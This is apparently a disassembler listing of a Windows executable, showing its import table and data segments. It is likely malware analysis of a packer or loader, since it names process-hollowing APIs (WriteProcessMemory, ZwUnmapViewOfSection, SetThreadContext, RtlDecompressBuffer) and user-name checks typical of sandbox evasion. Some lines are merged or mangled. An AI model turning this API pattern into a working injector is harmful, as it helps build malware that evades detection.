extrn GetFileSize:dword ; CODE XREF: sub_40171B+29�p
; DATA XREF: sub_40171B+29�r ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_40171B+1C�p
; DATA XREF: sub_40171B+1C�r ...
; int __stdcall lstrcmpA(LPCSTR lpString1,LPCSTR lpString2)
extrn lstrcmpA:dword ; CODE XREF: sub_4017DA+3D�p
; sub_4017DA+4C�p
; DATA XREF: ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName,DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: WinMain(x,x,x,x)+57�p
; DATA XREF: WinMain(x,x,x,x)+57�r ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: WinMain(x,x,x,x)+1B�p
; __NMSG_WRITE+81�p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap,DWORD dwFlags,SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: __heap_alloc+3E�p
; ___sbh_heap_init+D�p ...
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: start+160�p
; __ioinit+57�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: start:loc_401F8B�p
; DATA XREF: start:loc_401F8B�r ...
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: start+20�p
; DATA XREF: start+20�r ...
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: __heap_init+44�p
; .text:0040213E�p
; DATA XREF: ...
; HANDLE __stdcall HeapCreate(DWORD flOptions,SIZE_T dwInitialSize,SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: __heap_init+11�p
; DATA XREF: __heap_init+11�r ...
; BOOL __stdcall VirtualFree(LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: .text:004020FE�p
; .text:00402109�p ...
; BOOL __stdcall HeapFree(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: .text:00402116�p
; .text:00402134�p ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+7E�p
; ___sbh_alloc_new_group+52�p ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+27�p
; _realloc+FD�p ...
; BOOL __stdcall IsBadWritePtr(LPVOID lp,UINT_PTR ucb)
extrn IsBadWritePtr:dword ; CODE XREF: ___sbh_heap_check+1B�p
; ___sbh_heap_check+55�p ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: unknown_libname_1+29�p
; sub_40469C-7�p
; DATA XREF: ...
; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: _doexit+1A�p
; DATA XREF: _doexit+1A�r ...
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: _doexit+13�p
; DATA XREF: _doexit+13�r ...
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: __NMSG_WRITE+155�p
; DATA XREF: __NMSG_WRITE+155�r ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401000+3A�p
; sub_401000+45�p ...
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: __XcptFilter+167�p
; DATA XREF: __XcptFilter+167�r ...
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword
; CODE XREF: ___crtGetEnvironmentStringsA+113�p
; DATA XREF: ___crtGetEnvironmentStringsA+113�r ...
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_403A70�p
; DATA XREF: ___crtGetEnvironmentStringsA:loc_403A70�r ...
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+C1�p
; DATA XREF: ___crtGetEnvironmentStringsA+C1�r ...
; int __stdcall WideCharToMultiByte(UINT CodePage,DWORD dwFlags,LPCWSTR lpWideCharStr,int cchWideChar,LPSTR lpMultiByteStr,int cbMultiByte,LPCSTR lpDefaultChar,LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword
; CODE XREF: ___crtGetEnvironmentStringsA+86�p
; ___crtGetEnvironmentStringsA+A8�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_4039C9�p
; ___crtLCMapStringA:loc_40530C�p ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+1C�p
; ___crtGetEnvironmentStringsA+52�p
; DATA XREF: ...
; UINT __stdcall SetHandleCount(UINT uNumber)
extrn SetHandleCount:dword ; CODE XREF: __ioinit+19C�p
; DATA XREF: __ioinit+19C�r ...
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: __ioinit+FE�p
; __ioinit+165�p
; DATA XREF: ...
; UINT __stdcall GetACP()
extrn GetACP:dword ; CODE XREF: __setmbcp+42�p
; DATA XREF: .text:004047E5�r ...
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; CODE XREF: __setmbcp+2B�p
; DATA XREF: .text:004047D0�r ...
; BOOL __stdcall GetCPInfo(UINT CodePage,LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: _setSBUpLow+1C�p
; __setmbcp+93�p ...
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; LONG __stdcall InterlockedExchange(volatile LONG *Target,LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: __ValidateEH3RN+131�p
; __ValidateEH3RN+196�p ...
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress,PMEMORY_BASIC_INFORMATION lpBuffer,SIZE_T dwLength)
extrn VirtualQuery:dword ; CODE XREF: __ValidateEH3RN+B3�p
; __resetstkoflw+1A�p ...
; SIZE_T __stdcall HeapSize(HANDLE hHeap,DWORD dwFlags,LPCVOID lpMem)
extrn HeapSize:dword ; CODE XREF: __msize+30�p
; DATA XREF: __msize+30�r ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: ___security_init_cookie+43�p
; DATA XREF: ___security_init_cookie+43�r ...
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: ___security_init_cookie+37�p
; DATA XREF: ___security_init_cookie+37�r ...
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: ___security_init_cookie+2F�p
; DATA XREF: ___security_init_cookie+2F�r ...
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: ___security_init_cookie+27�p
; DATA XREF: ___security_init_cookie+27�r ...
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword ; CODE XREF: ___security_init_cookie+1B�p
; DATA XREF: ___security_init_cookie+1B�r ...
; int __stdcall LCMapStringA(LCID Locale,DWORD dwMapFlags,LPCSTR lpSrcStr,int cchSrc,LPSTR lpDestStr,int cchDest)
extrn LCMapStringA:dword ; CODE XREF: ___crtLCMapStringA+2C3�p
; ___crtLCMapStringA+344�p ...
; int __stdcall MultiByteToWideChar(UINT CodePage,DWORD dwFlags,LPCSTR lpMultiByteStr,int cbMultiByte,LPWSTR lpWideCharStr,int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: ___crtLCMapStringA+C0�p
; ___crtLCMapStringA+141�p ...
; int __stdcall LCMapStringW(LCID Locale,DWORD dwMapFlags,LPCWSTR lpSrcStr,int cchSrc,LPWSTR lpDestStr,int cchDest)
extrn LCMapStringW:dword ; CODE XREF: ___crtLCMapStringA+27�p
; ___crtLCMapStringA+15B�p ...
; BOOL __stdcall GetStringTypeA(LCID Locale,DWORD dwInfoType,LPCSTR lpSrcStr,int cchSrc,LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: ___crtGetStringTypeA+19C�p
; DATA XREF: ___crtGetStringTypeA+19C�r ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType,LPCWSTR lpSrcStr,int cchSrc,LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: ___crtGetStringTypeA+24�p
; ___crtGetStringTypeA+128�p
; DATA XREF: ...
; int __stdcall GetLocaleInfoA(LCID Locale,LCTYPE LCType,LPSTR lpLCData,int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: ___ansicp+20�p
; DATA XREF: ___ansicp+20�r ...
; BOOL __stdcall VirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect)
extrn VirtualProtect:dword ; CODE XREF: __resetstkoflw+D5�p
; DATA XREF: __resetstkoflw+D5�r ...
; void __stdcall GetSystemInfo(LPSYSTEM_INFO lpSystemInfo)
extrn GetSystemInfo:dword ; CODE XREF: __resetstkoflw+2B�p
; DATA XREF: __resetstkoflw+2B�r ...
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: __NMSG_WRITE+14E�p
; __ioinit+157�p
; DATA XREF: ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401000+77�p
; DATA XREF: sub_401000+77�r ...
;
; Imports from USER32.dll
;
; int __stdcall MessageBoxA(HWND hWnd,LPCSTR lpText,LPCSTR lpCaption,UINT uType)
extrn MessageBoxA:dword ; CODE XREF: WinMain(x,x,x,x)+43�p
; DATA XREF: WinMain(x,x,x,x)+43�r ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40610Ch
align 10h
; char aRtlgetcompress[]
aRtlgetcompress db 'RtlGetCompressionWorkSpaceSize',0 ; DATA XREF: sub_401000+3C�o
align 10h
; char ProcName[]
ProcName db 'RtlDecompressBuffer',0 ; DATA XREF: sub_401000+34�o
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401000+1C�o
; sub_405F66+5�o
align 10h
; char ModuleName[]
ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_4015A2+DB�o
; WinMain(x,x,x,x)+9F�o ...
align 10h
; char aWriteprocessme[]
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: sub_4015A2+D6�o
; sub_405FA0�o
align 4
; char aCurrentuser[]
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_4017DA+47�o
; char String1[]
String1 db 'USER',0 ; DATA XREF: sub_4017DA+38�o
align 4
; char aVirtualalloc[]
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: WinMain(x,x,x,x)+9A�o
align 4
; char Text[]
Text: ; DATA XREF: WinMain(x,x,x,x)+3D�o
unicode 0, <.>,0
; char Caption[]
Caption db '.%%%^###########%^#^',0 ; DATA XREF: WinMain(x,x,x,x)+38�o
align 4
; char aZwunmapviewofs[]
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_405F66�o
align 4
; char aSetthreadconte[]
aSetthreadconte db 'SetThreadContext',0 ; DATA XREF: sub_405F83�o
align 10h
; const CHAR stru_4061E0
stru_4061E0 _msEH <0FFFFFFFFh, offset loc_402021, offset loc_402035>
; DATA XREF: start+2�o
; char aCorexitprocess[]
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
; char aMscoree_dll[]
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_408064�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 4
; char asc_4065D8[]
asc_4065D8 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
byte_406613 db 0 ; DATA XREF: __wincmdln+1B�o
align 8
stru_406618 _msEH <0FFFFFFFFh, offset loc_403CB6, offset loc_403CBA>
; DATA XREF: sub_403C89+2�o
align 8
stru_406628 _msEH <0FFFFFFFFh, offset loc_403CFA, offset loc_403CFE>
; DATA XREF: sub_403CCD+2�o
; char aGetprocesswind[]
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
; char aGetuserobjecti[]
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
; char aGetlastactivep[]
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
; char aGetactivewindo[]
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
; char aMessageboxa[]
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
; char aUser32_dll[]
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 8
stru_4066A8 _msEH <0FFFFFFFFh, offset sub_404688, offset sub_40468C>
; DATA XREF: sub_40469C-2F�o
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_4051A4�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 4
stru_406858 _msEH <0FFFFFFFFh, offset loc_40517F, offset loc_405183>
; DATA XREF: ___security_error_handler+5�o
dd 41h dup(0)
asc_406968: ; DATA XREF: .data:off_4082A0�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_406B6A dw 20h ; DATA XREF: .data:off_4082A4�o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o
align 10h
stru_406D70 _msEH <0FFFFFFFFh, offset loc_4055CC, offset loc_4055D0>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 4053C9h, 4053CDh, 0FFFFFFFFh, 405497h, 40549Bh
dd 0
stru_406D98 _msEH <0FFFFFFFFh, offset loc_405768, offset loc_40576C>
; DATA XREF: ___crtGetStringTypeA+2�o
align 8
stru_406DA8 _msEH <0FFFFFFFFh, offset loc_40595E, offset loc_405962>
; DATA XREF: ___convertcp+2�o
align 8
dd 48h, 0Eh dup(0)
dd offset dword_408190
dd offset dword_406E00
dd 2
dword_406E00 dd 3D68h, 4C50h, 0dword_406E0C dd 2 dup(0) ; sub_403C89:loc_403C9C�o
dword_406E14 dd 0 ; sub_403CCD:loc_403CE0�o
dd 6E70h, 2 dup(0)
dd 73B6h, 6008h, 6F6Ch, 2 dup(0)
dd 73D2h, 6104h, 6E68h, 2 dup(0)
dd 73EEh, 6000h, 5 dup(0)
dd 73DEh, 0
dd 6F94h, 6FA4h, 6FB6h, 6FCAh, 6FDEh, 6FF0h, 7004h, 7018h
dd 702Ah, 703Ah, 7046h, 7054h, 7062h, 706Eh, 7084h, 709Ah
dd 70A6h, 70B8h, 70CAh, 70DAh, 70E8h, 70F6h, 7104h, 7110h
dd 7120h, 712Eh, 713Eh, 714Ch, 7160h, 7174h, 6F82h, 7190h
dd 71ACh, 71C6h, 71DEh, 71F8h, 720Eh, 721Eh, 7238h, 724Ah
dd 7258h, 7262h, 726Eh, 727Ah, 7286h, 729Ch, 72ACh, 72B8h
dd 72D2h, 72E2h, 72F8h, 730Eh, 7328h, 7338h, 734Eh, 735Eh
dd 7370h, 7382h, 7394h, 73A6h, 7180h, 6F74h, 0
dd 73C4h, 0
dd 724600EFh, 694C6565h, 72617262h, 1980079h, 50746547h
dd 41636F72h, 65726464h, 7373h, 6F4C0248h, 694C6461h, 72617262h
dd 4179h, 6956037Ch, 61757472h, 6575516Ch, 78457972h, 2AC0000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1CDh
aGetthreadconte db 'GetThreadContext',0
align 2
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 10h
dd 65470177h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6956037Ah
dd 61757472h, 6F72506Ch, 74636574h, 7845h, 69560374h, 61757472h
dd 6C6C416Ch, 7845636Fh, 2C50000h, 75736552h, 6854656Dh
dd 64616572h, 2A90000h, 64616552h, 656C6946h, 15B0000h
dd 46746547h, 53656C69h, 657A69h, 7243004Dh, 65746165h
dd 656C6946h, 3B00041h, 7274736Ch, 41706D63h, 30C0000h
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 75h ; u
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 1AFh
aGetstartupinfo db 'GetStartupInfoA',0
db 8
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1DFh
aGetversionexa db 'GetVersionExA',0
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
db 8
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 376h
aVirtualfree db 'VirtualFree',0
db 0Ch
db 2, 48h, 65h
aApfree db 'apFree',0
align 10h
db 73h ; s
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 10h
db 10h
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 22Ch
aIsbadwriteptr db 'IsBadWritePtr',0
aP db '¯',0
aExitprocess db 'ExitProcess',0
db 4Fh ; O
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 10h
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 94h ; ”
db 3, 57h, 72h
aItefile db 'iteFile',0
db 0B1h ; ±
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 10h
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 87h ; ‡
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
dd 65530317h, 6E614874h, 43656C64h, 746E756Fh, 15E0000h
dd 46746547h, 54656C69h, 657079h, 654700F5h, 50434174h
dd 18B0000h, 4F746547h, 50434D45h, 0FC0000h, 43746547h
dd 666E4950h, 2CA006Fh, 556C7452h, 6E69776Eh, 21F0064h
aInterlockedexc db 'InterlockedExchange',0
db 7Bh ; {
db 3, 56h, 69h
aRtualquery db 'rtualQuery',0
align 4
db 12h
db 2, 48h, 65h
aApsize db 'apSize',0
align 4
db 97h ; —
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 13Eh
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcessId',0
dw 1C0h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
db 3Ah ; :
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 10h
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 16C0000h
dd 4C746547h, 6C61636Fh, 666E4965h, 416Fh, 69560379h, 61757472h
dd 6F72506Ch, 74636574h, 1BB0000h, 53746547h, 65747379h
dd 666E496Dh, 454B006Fh, 4C454E52h, 642E3233h, 6C6Ch, 654D01DEh
dd 67617373h, 786F4265h, 53550041h, 32335245h, 6C6C642Eh
dd 1230000h, 55746547h, 4E726573h, 41656D61h, 44410000h
dd 49504156h, 642E3233h, 6C6Ch, 0
_rdata ends
; Section 3. (virtual address 00008000)
; Virtual size : 00036AE0 ( 223968.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00006800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 408000h
dword_408000 dd 0 dd offset ___security_init_cookie
dd offset sub_405F66
dd offset sub_405F83
dd offset sub_405FA0
dword_408014 dd 0 dword_408018 dd 0 dd offset ___onexitinit
dd offset ___initmbctable
dword_408024 dd 0 dword_408028 dd 0 dword_40802C dd 0 dword_408030 dd 0 dword_408034 dd 3 dup(0) dword_408040 dd 6C00h ; sub_4010AD+A9�r ...
align 10h
off_408050 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_408054 dd 2 ; __FF_MSGBANNER+E�r
dd 10h, 0
dword_408060 dd 2 ; __NMSG_WRITE+3A�r ...
off_408064 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40655Ch, 9, 406530h, 0Ah, 406498h, 10h, 40646Ch
dd 11h, 40643Ch, 12h, 406418h, 13h, 4063ECh, 18h, 4063B4h
dd 19h, 40638Ch, 1Ah, 406354h, 1Bh, 40631Ch, 1Ch, 4062F4h
dd 1Dh, 406250h, 78h, 40623Ch, 79h, 40622Ch, 7Ah, 40621Ch
dd 0FCh, 406218h, 0FFh, 406208h
dword_4080F8 dd 0C0000005h, 0Bh, 0 ; __XcptFilter+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_408170 dd 3 dword_408174 dd 7 dword_408178 dd 0Ah ; __XcptFilter+6�r
dword_40817C dd 8Ch ; __XcptFilter+BA�w ...
dd 0FFFFFFFFh, 0A80h, 2 dup(0)
dword_408190 dd 0BB40E64Eh ; sub_40469C�r ...
align 8
byte_408198 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 10h
dword_4081A0 dd 3A4h dword_4081A4 dd 82798260h dd 21h, 0
dword_4081B0 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_408290 dd 19930520h, 3 dup(0) ; __NLG_Notify+2�o
off_4082A0 dd offset asc_406968 ; DATA XREF: _x_ismbbtype+18�r
; .text:004052B1�r ...
; " ((((( H"
off_4082A4 dd offset word_406B6A ; DATA XREF: .text:004052AB�r
dd 1, 0
dword_4082B0 dd 1 dd 2Eh, 1, 0
byte_4082C0 db 0 ; DATA XREF: sub_4010AD+49�w
; sub_401313+2E�w ...
align 4
dword_4082C4 dd 0 ; sub_4010AD+E�r ...
; HANDLE hFile
hFile dd 0 ; DATA XREF: sub_40171B+24�w
; sub_40171B+4D�r
byte_4082CC db 0 ; DATA XREF: sub_4010AD+1B�w
; sub_4010AD+43�w ...
align 10h
; HANDLE hThread
hThread dd 0 ; DATA XREF: sub_4015A2+14E�w
; sub_401707�r
dd 2 dup(0)
dword_4082DC dd 0 byte_4082E0 db 0 ; DATA XREF: sub_4010AD+2B�w
; sub_4010AD+34�w ...
align 8
byte_4082E8 db 0 ; DATA XREF: sub_401088+17�w
; sub_4010AD+85�o ...
dword_4082E9 dd 0 ; sub_4010AD+CC�r ...
align 10h
dd 4 dup(0)
byte_408300 db 0 ; DATA XREF: sub_4010AD+BD�w
align 4
dd 9 dup(0)
byte_408328 db 0 ; DATA XREF: sub_4010AD+62�w
align 4
dd 27h dup(0)
byte_4083C8 db 0 ; DATA XREF: sub_4010AD+11B�w
align 4
dd 0Dh dup(0)
dd 0D844h dup(?)
dword_43E510 dd ? dword_43E514 dd ? ; WinMain(x,x,x,x)+152�r
byte_43E518 db ? ; DATA XREF: sub_401707+6�w
; WinMain(x,x,x,x)+163�w
align 4
; DWORD nNumberOfBytesToRead
nNumberOfBytesToRead dd ? ; DATA XREF: sub_4010AD+25�r
